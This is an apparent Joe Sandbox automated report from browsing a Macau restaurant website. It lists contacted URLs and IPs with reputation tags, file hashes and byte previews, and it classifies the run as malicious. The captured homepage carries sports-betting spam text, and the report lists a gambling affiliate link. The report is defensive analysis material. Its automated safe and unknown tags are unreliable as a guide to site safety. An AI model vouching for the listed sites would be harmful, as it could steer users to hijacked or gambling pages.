                                                                        https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1false
                                                                          high
                                                                          http://www.gourmethousemacau.com/images/menu03.jpgfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.gourmethousemacau.com/images/icon_photo.jpgfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://hm.baidu.com/hm.gif?cc=1&ck=1&cl=24-bit&ds=1280x1024&vl=913&et=0&ja=0&ln=en-us&lo=0&rnd=2010534784&si=3eff88a357a8c5aca6bb583a65de2875&v=1.3.0&lv=1&sn=31345&r=0&ww=1280&u=http%3A%2F%2Fwww.gourmethousemacau.com%2F&tt=Gourmet%20House%20Macau%20Ltdfalse
                                                                            high
                                                                            http://www.gourmethousemacau.com/uploadfiles/SRL_3_1_3752094.jpgfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://sp0.baidu.com/9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif?l=http://www.gourmethousemacau.com/false
                                                                              high
                                                                              http://www.gourmethousemacau.com/images/menu_bg.jpgfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://www.gourmethousemacau.com/images/copyrightbg.jpgfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://www.gourmethousemacau.com/images/menu04b.jpgfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://www.gourmethousemacau.com/false
                                                                                unknown
                                                                                https://s.360.cn/so/zz.gif?url=http%3A%2F%2Fwww.gourmethousemacau.com%2FIndex.asp&sid=d182b3f28525f2db83acfaaf6e696dba&token=dp1s8a2.bx3efd2n8I5/2m5ofc2.dubafalse
                                                                                  high
                                                                                  http://www.gourmethousemacau.com/images/menu05.jpgfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://sp0.baidu.com/9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif?l=http://www.gourmethousemacau.com/Index.aspfalse
                                                                                    high
                                                                                    http://www.gourmethousemacau.com/images/productMain_icon.jpgfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://push.zhanzhang.baidu.com/push.jsfalse
                                                                                      high
                                                                                      http://s.360.cn/so/zz.gif?url=http%3A%2F%2Fwww.gourmethousemacau.com%2F&sid=d182b3f28525f2db83acfaaf6e696dba&token=d/1m8o2cb.3ufa2c8a5m2e5sfu2odhbtfalse
                                                                                        high
                                                                                        http://www.gourmethousemacau.com/static/bootstrap/css/bootstrap.min.cssfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://www.gourmethousemacau.com/m/static/js/jquery.min.jsfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://www.gourmethousemacau.com/js/scriptaculous.js?load=effectsfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://www.gourmethousemacau.com/m/static/font-icon/font-awesome.min.cssfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://www.gourmethousemacau.com/images/menu05b.jpgfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://www.gourmethousemacau.com/Index.aspfalse
                                                                                          unknown
                                                                                          http://www.gourmethousemacau.com/false
                                                                                            unknown
                                                                                            http://www.gourmethousemacau.com/OurChocology.aspfalse
                                                                                              unknown
                                                                                              http://www.gourmethousemacau.com/js/prototype.jsfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://www.gourmethousemacau.com/images/menu01.jpgfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                                                              http://fontawesome.iochromecache_260.1.drfalse
                                                                                                high
                                                                                                https://web.archive.org/web/20100324014747/http://blindsignals.com/index.php/2009/07/jquery-delay/chromecache_173.1.drfalse
                                                                                                  high
                                                                                                  https://promisesaplus.com/#point-75chromecache_173.1.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://html.spec.whatwg.org/multipage/forms.html#concept-fe-disabledchromecache_173.1.drfalse
                                                                                                    high
                                                                                                    https://www.elevenkicks.com/air-jordan-5-grape-p-997.htmlchromecache_158.1.dr, chromecache_250.1.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://bugs.webkit.org/show_bug.cgi?id=29084chromecache_173.1.drfalse
                                                                                                      high
                                                                                                      https://github.com/eslint/eslint/issues/6125chromecache_173.1.drfalse
                                                                                                        high
                                                                                                        https://html.spec.whatwg.org/multipage/forms.html#concept-option-disabledchromecache_173.1.drfalse
                                                                                                          high
                                                                                                          https://github.com/jrburke/requirejs/wiki/Updating-existing-libraries#wiki-anonchromecache_173.1.drfalse
                                                                                                            high
                                                                                                            http://encytemedia.com/)chromecache_220.1.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://bugzilla.mozilla.org/show_bug.cgi?id=687787chromecache_173.1.drfalse
                                                                                                              high
                                                                                                              https://bugs.chromium.org/p/chromium/issues/detail?id=470258chromecache_173.1.drfalse
                                                                                                                high
                                                                                                                https://bugs.jquery.com/ticket/13378chromecache_173.1.drfalse
                                                                                                                  high
                                                                                                                  https://promisesaplus.com/#point-64chromecache_173.1.drfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  https://s.360.cn/so/zz.gifchromecache_228.1.drfalse
                                                                                                                    high
                                                                                                                    https://promisesaplus.com/#point-61chromecache_173.1.drfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://huddletogether.com/projects/lightbox2/chromecache_166.1.drfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://hmcdn.baidu.com/static/tongji/plugins/chromecache_249.1.drfalse
                                                                                                                      high
                                                                                                                      https://jsperf.com/getall-vs-sizzle/2chromecache_173.1.drfalse
                                                                                                                        high
                                                                                                                        http://www.huddletogether.comchromecache_166.1.drfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://developer.mozilla.org/en-US/docs/CSS/displaychromecache_173.1.drfalse
                                                                                                                          high
                                                                                                                          https://jquery.com/chromecache_173.1.drfalse
                                                                                                                            high
                                                                                                                            http://www.faqts.com/knowledge_base/view.phtml/aid/1602chromecache_166.1.drfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://www.elevenkicks.com/yeezys-c-17_18.htmlchromecache_250.1.drfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://github.com/jquery/sizzle/pull/225chromecache_173.1.drfalse
                                                                                                                              high
                                                                                                                              https://html.spec.whatwg.org/multipage/infrastructure.html#strip-and-collapse-whitespacechromecache_173.1.drfalse
                                                                                                                                high
                                                                                                                                https://sizzlejs.com/chromecache_173.1.drfalse
                                                                                                                                  high
                                                                                                                                  https://bugs.chromium.org/p/chromium/issues/detail?id=449857chromecache_173.1.drfalse
                                                                                                                                    high
                                                                                                                                    http://script.aculo.uschromecache_220.1.dr, chromecache_262.1.drfalse
                                                                                                                                      high
                                                                                                                                      https://bugs.webkit.org/show_bug.cgi?id=136851chromecache_173.1.drfalse
                                                                                                                                        high
                                                                                                                                        http://jquery.org/licensechromecache_173.1.drfalse
                                                                                                                                          high
                                                                                                                                          https://jsperf.com/thor-indexof-vs-for/5chromecache_173.1.drfalse
                                                                                                                                            high
                                                                                                                                            https://bugs.jquery.com/ticket/12359chromecache_173.1.drfalse
                                                                                                                                              high
                                                                                                                                              https://www.mcf49.com:9168/?agent_code=3387088chromecache_228.1.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://fclog.baidu.com/log/ocpcagl?type=behavior&emd=eucchromecache_249.1.drfalse
                                                                                                                                                high
                                                                                                                                                https://html.spec.whatwg.org/#strip-and-collapse-whitespacechromecache_173.1.drfalse
                                                                                                                                                  high
                                                                                                                                                  http://diveintomark.org/)chromecache_220.1.drfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://web.archive.org/web/20141116233347/http://fluidproject.org/blog/2008/01/09/getting-setting-achromecache_173.1.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://drafts.csswg.org/cssom/#common-serializing-idiomschromecache_173.1.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://hmcdn.baidu.com/staticchromecache_249.1.drfalse
                                                                                                                                                        high
                                                                                                                                                        http://mir.aculo.us)chromecache_220.1.dr, chromecache_262.1.drfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        low
                                                                                                                                                        https://github.com/jquery/jquery/pull/557)chromecache_173.1.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://bugs.chromium.org/p/chromium/issues/detail?id=378607chromecache_173.1.drfalse
                                                                                                                                                            high
                                                                                                                                                            http://tongji.baidu.com/hm-web/welcome/icochromecache_249.1.drfalse
                                                                                                                                                              high
                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                              104.192.108.23
                                                                                                                                                              jspassport.ssl.qhimg.com.webcdn.360qhcdn.comUnited States
                                                                                                                                                              55992QIHOOBeijingQihuTechnologyCompanyLimitedCNfalse
                                                                                                                                                              142.250.203.100
                                                                                                                                                              www.google.comUnited States
                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                              142.250.203.110
                                                                                                                                                              clients.l.google.comUnited States
                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                              59.188.3.132
                                                                                                                                                              www.gourmethousemacau.comHong Kong
                                                                                                                                                              17444NWT-AS-APASnumberforNewWorldTelephoneLtdHKfalse
                                                                                                                                                              39.156.68.163
                                                                                                                                                              share.n.shifen.comChina
                                                                                                                                                              9808CMNET-GDGuangdongMobileCommunicationCoLtdCNfalse
                                                                                                                                                              104.193.88.123
                                                                                                                                                              www.wshifen.comUnited States
                                                                                                                                                              55967BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtdfalse
                                                                                                                                                              103.235.46.191
                                                                                                                                                              hm.e.shifen.comHong Kong
                                                                                                                                                              55967BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtdfalse
                                                                                                                                                              239.255.255.250
                                                                                                                                                              unknownReserved
                                                                                                                                                              unknownunknownfalse
                                                                                                                                                              23.251.32.116
                                                                                                                                                              www.tbty20000.comUnited States
                                                                                                                                                              62468VPSQUANUSfalse
                                                                                                                                                              171.8.167.89
                                                                                                                                                              s.360.cnChina
                                                                                                                                                              137687CHINATELECOM-HENAN-LUOYANG-IDCLuoyangHenanProvincePRfalse
                                                                                                                                                              65.9.25.112
                                                                                                                                                              d22oj5itccz3aw.cloudfront.netUnited States
                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                              142.250.203.109
                                                                                                                                                              accounts.google.comUnited States
                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                              IP
                                                                                                                                                              192.168.2.1
                                                                                                                                                              127.0.0.1
                                                                                                                                                              Joe Sandbox Version:37.0.0 Beryl
                                                                                                                                                              Analysis ID:825076
                                                                                                                                                              Start date and time:2023-03-13 05:25:05 +01:00
                                                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                                                              Overall analysis duration:0h 5m 5s
                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                              Report type:full
                                                                                                                                                              Cookbook file name:browseurl.jbs
                                                                                                                                                              Sample URL:http://www.gourmethousemacau.com/
                                                                                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                              Number of analysed new started processes analysed:14
                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                              Technologies:
                                                                                                                                                              • HCA enabled
                                                                                                                                                              • EGA enabled
                                                                                                                                                              • HDC enabled
                                                                                                                                                              • AMSI enabled
                                                                                                                                                              Analysis Mode:default
                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                              Detection:MAL
                                                                                                                                                              Classification:mal48.win@30/125@23/14
                                                                                                                                                              EGA Information:Failed
                                                                                                                                                              HDC Information:Failed
                                                                                                                                                              HCA Information:
                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                              • Number of executed functions: 0
                                                                                                                                                              • Number of non-executed functions: 0
                                                                                                                                                              Cookbook Comments:
                                                                                                                                                              • Browse: http://www.gourmethousemacau.com/Index.asp
                                                                                                                                                              • Browse: http://www.gourmethousemacau.com/AboutUs.asp
                                                                                                                                                              • Browse: http://www.gourmethousemacau.com/OurChocology.asp
                                                                                                                                                              • Browse: http://www.gourmethousemacau.com/OurProducts.asp
                                                                                                                                                              • Exclude process from analysis (whitelisted): SgrmBroker.exe, svchost.exe
                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 93.184.221.240, 209.197.3.8, 142.250.203.99, 34.104.35.123
                                                                                                                                                              • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, cds.d2s7q6s2.hwcdn.net, www-www.bing.com.trafficmanager.net, wu-bg-shim.trafficmanager.net, wu.azureedge.net, edgedl.me.gvt1.com, www-bing-com.dual-a-0001.a-msedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com
                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                              • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                              TimeTypeDescription
                                                                                                                                                              05:27:44API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                                                                                                                                              No context
                                                                                                                                                              No context
                                                                                                                                                              No context
                                                                                                                                                              No context
                                                                                                                                                              No context
                                                                                                                                                              Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                              Category:modified
                                                                                                                                                              Size (bytes):10874
                                                                                                                                                              Entropy (8bit):3.1645162062353496
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:cY+38+DJl+ibJ6+ioJJ+i3N+WtT+E9tD+Ett3d+E3z5+6I3+zJsn+VA:j+s+v+b+P+m+0+Q+q+q+73+zOn+VA
                                                                                                                                                              MD5:E7831E8859FB9154395A0B298D045C2F
                                                                                                                                                              SHA1:240A49241F1DEE02D15EE579A45EB2DEB1394865
                                                                                                                                                              SHA-256:0718065044A559487C213F73C1782ABC17DE1CC0D5DF76DF425A8E51B0A1DC9E
                                                                                                                                                              SHA-512:A0374A72138FFA3043B3B64B3D7845DFB1CF90B80C26401B44C87C20B64BE0AEFB0244F6747619FB6DF5283CB141FA833102BFD7A36E24F9ADA98AAB43242212
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=28, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=105], baseline, precision 8, 105x28, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):19377
                                                                                                                                                              Entropy (8bit):6.790638132156297
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:dYNMtKwZR4RdFY28y4lT7JYNMtKwZR4RdFVHknGPg4ZXwIKwrHHfDLlMhMl:dYNg7+D1PiZYNg7+DVEnGPg4ZXgwTlMg
                                                                                                                                                              MD5:7A2B6080F77A12467942786939C57BDA
                                                                                                                                                              SHA1:52D192134CA09B217F4BC1B43F71E5840E24AF21
                                                                                                                                                              SHA-256:368EB30E6208D691D698862CCA4A126C5B4F500D51B608287E651B2AE64666E0
                                                                                                                                                              SHA-512:1682E8C8929A394757E50581BC4DE39930CDF99E8672805584C4CEF8F9C791983BF1DBA7C20171B370E57B1AC3B3FE611D2CD2CB71D16B694F0B330AE31E0F42
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:......Exif..MM.*...............i.......................................................................................(...........1...........2..........i............. ............'.......'.Adobe Photoshop CS6 (Windows).2020:05:26 16:36:14.............0221.......................i...........................................n...........v.(.....................~...................H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=350, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=160], baseline, precision 8, 160x350, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):96268
                                                                                                                                                              Entropy (8bit):7.875688036056294
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:LYDOgn0YDOgntEYo4P2fqeBDlostkRiS6ILPz9aLNUUPWuU1pAHL87Pc3Bg4Fbc:LYKm0YKmZt2nBDHkQS6iz9EU1JpAnG4a
                                                                                                                                                              MD5:0C8EFD396D3CBAB7581CD0C570E04010
                                                                                                                                                              SHA1:9964126636A09578B099A0631353B8D9C86ED327
                                                                                                                                                              SHA-256:0C79E1E022F2431368EC050EE10F4ACBD7CD0AD817291CB2062B1A40FC13E308
                                                                                                                                                              SHA-512:6F166FA586BB51706C8CC745F1727F4FCA6B8BC185334E0C33214C7BB291778651BACF253D7C47CCD1A13DF794138F621D1106CD8C8AAB5A3C5E9D0AF605C0BD
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:....#.Exif..MM.*...........................^...........................................................................(...........1...........2..........i............. ............'.......'.Adobe Photoshop CS6 (Windows).2020:05:28 11:34:01.............0221...................................^...............................n...........v.(.....................~.........."n.......H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=14, height=3744, bps=182, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 5D Mark II, orientation=upper-left, width=5616], baseline, precision 8, 500x334, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):225579
                                                                                                                                                              Entropy (8bit):7.931611481231521
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6144:IlJzlJJ8IQmWOjZmWznn6d5EJM6x855Er1cekxqA3YZxxrS:wJhJisbpzn6TEG+ry+A3YZx1S
                                                                                                                                                              MD5:60026B83B46CA887EE0B005B850999A7
                                                                                                                                                              SHA1:0D8B0B0E320598FC2E9A520DBEB6EEAAEEE82956
                                                                                                                                                              SHA-256:B2ED760A31E9055D5C75E75E8D58EA3052155842B0B4B6A9F23438A7CFD5C10A
                                                                                                                                                              SHA-512:7CD60DCCCBE974F206160DB9EF6F919585FB2946C0835E1034D0B2052B8D7A324B1DD8E196F3382CACC10AD93D4B05DB6AC3AD5CD68AA06DE26D7003483A0F6C
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:....0qExif..II*...............................................................................................................................(...........1...........2...........i...........8.........Canon.Canon EOS 5D Mark II...$..'....$..'..Adobe Photoshop CS6 (Windows).2020:06:22 10:11:06.............................."...........'.......d...........0221....................................................................................................................30..........30..........30..................................N.......................................................................................1...........2...........4.......$.......................2013:11:08 13:06:34.2013:11:08 13:06:34.................................d.........U......!9.....930611067.d.......d.......................EF100mm f/2.8 Macro.......................................(................................,......H.......H............XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IE
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2909), with CRLF line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):14526
                                                                                                                                                              Entropy (8bit):5.558588099535321
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:SIFKa9lKYiLeWN60/q/Wc1zqRHze46mxZQ2jECZPBKW4q7WlOKqCW2VAq/4hc:SIgFbQWwzqRS4F4CZ0LoWQPCAqN
                                                                                                                                                              MD5:A3E96AD8A53B476477338DB9AB70FF64
                                                                                                                                                              SHA1:45DFAE13061AF10483DDCC60039DA46DD4B0255A
                                                                                                                                                              SHA-256:F16E50139EE0969006C6DA9056BB2213B6376E0495202C5D1268BBF695204184
                                                                                                                                                              SHA-512:B1FA4BEEE1D9FE8E6ADEC699CCF15D3DC9C6EA672335500A93780791B5BF2E15C1ADDEC05032D04DADE5286756664AFD6CA683C147D56C40750D60742B39B920
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/Index.asp
                                                                                                                                                              Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />..<meta name="applicable-device" content="pc" />.. <meta name="mobile-agent" content="format=xhtml;url=http://gourmethousemacau.com/m.html">.. <meta name="mobile-agent" content="format=html5;url=http://gourmethousemacau.com/m.html">.. <link rel="alternate" media="only screen and(max-width: 640px)" href="http://gourmethousemacau.com/m.html">..<title>&#21170;&#29190;&#20307;&#32946;&#22312;&#32447;&#30452;&#25773;</title>..<meta name="keywords" content="&#21170;&#29190;&#20307;&#32946;&#22312;&#32447;&#30452;&#25773;&#20080;&#29699;&#32;&#21170;&#29190;&#20307;&#32946;&#22312;&#32447;&#30452;&#25773;&#23448;&#32593;&#32;&#21170;&#29190;&#20307;&#32946;&#22312;&#32447;&#30452;&#25773;&#27880;&#20876;&#32;&#21170;&#29190;&#20307;&#32946;&#2
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=14, height=3744, bps=182, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 5D Mark II, orientation=upper-left, width=5616], baseline, precision 8, 500x334, components 3
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):227297
                                                                                                                                                              Entropy (8bit):7.934561502080002
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6144:D9OH9OeivboHY6O4xMSjvFsJ6fWpr4wO3yM:Eohjr6OcOJ6c40M
                                                                                                                                                              MD5:E686E563CC54AF2D92DAE207B4AD7E3A
                                                                                                                                                              SHA1:77C80B5697840D451EDCF785C1C71240200495FD
                                                                                                                                                              SHA-256:B250069167C423616BACBF4AD06CD5FE297816C1A3BE5127F1D63D93FC931F93
                                                                                                                                                              SHA-512:43A0482FAB4CB716E203061DE2F4478AE0078C6C16F98D599E060994E4A6A9E738B63CB7CD455023D953C47F21B13C25DB74AA073DBB83B73F3E82C0F38FAC52
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/uploadfiles/SRL_9_1_3754306.jpg
                                                                                                                                                              Preview:....0\Exif..II*...............................................................................................................................(...........1...........2...........i...........8.........Canon.Canon EOS 5D Mark II...$..'....$..'..Adobe Photoshop CS6 (Windows).2020:06:22 10:11:52.............................."...........'.......d...........0221....................................................................................................................30..........30..........30..................................N.......................................................................................1...........2...........4.......$.......................2013:11:08 13:06:34.2013:11:08 13:06:34.................................d.........U......!9.....930611067.d.......d.......................EF100mm f/2.8 Macro.......................................(................................,......H.......H............XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IE
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=14, height=3744, bps=182, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 5D Mark II, orientation=upper-left, width=5616], baseline, precision 8, 500x334, components 3
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):256111
                                                                                                                                                              Entropy (8bit):7.943253287046111
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3072:DL8xL8bc3OFfoTZm1uz2VjssSq15QtsNV442SwKgDNI/TD0XzVMk2bcLzmYgDfN1:0ao3Om9M5j/aI0DNiTD0XzV/Nvfq/1l
                                                                                                                                                              MD5:2962447065DE643D14C1F007947E370B
                                                                                                                                                              SHA1:90E596B5CD993FBA53F42E9E15F83068F71C376D
                                                                                                                                                              SHA-256:D0464F31520796CA6C66440B00B2DAA8332A4623DE2DEB10AF1693E84CD74C47
                                                                                                                                                              SHA-512:1FF1DE18D48F2EB1E1B579D3D961B3D71BA0892F7B8B93A24775985B813C13F5D5B8502DAE0DDFC87472DF27D4072DA72D1448CAE42EF0631CCDF62C90061A4E
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/uploadfiles/SRL_1_1_3750019.jpg
                                                                                                                                                              Preview:....83Exif..II*...............................................................................................................................(...........1...........2...........i...........8.........Canon.Canon EOS 5D Mark II...$..'....$..'..Adobe Photoshop CS6 (Windows).2020:06:22 10:08:59.............................."...........'.......d...........0221....................................................................................................................30..........30..........30..................................N.......................................................................................1...........2...........4.......$.......................2013:11:08 13:06:34.2013:11:08 13:06:34.................................d.........U......!9.....930611067.d.......d.......................EF100mm f/2.8 Macro.......................................(................................4......H.......H............XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IE
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=350, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=160], baseline, precision 8, 160x350, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):92859
                                                                                                                                                              Entropy (8bit):7.8625951181059595
                                                                                                                                                              Encrypted:false
